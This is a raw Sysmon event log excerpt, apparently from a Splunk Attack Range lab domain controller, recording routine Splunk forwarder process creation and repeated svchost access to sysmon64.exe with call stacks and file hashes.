10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.486{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.497{59A5CD1D-8E58-6005-4100-00000000A301}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.423{59A5CD1D-8E58-6005-3F00-00000000A301}37603764C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\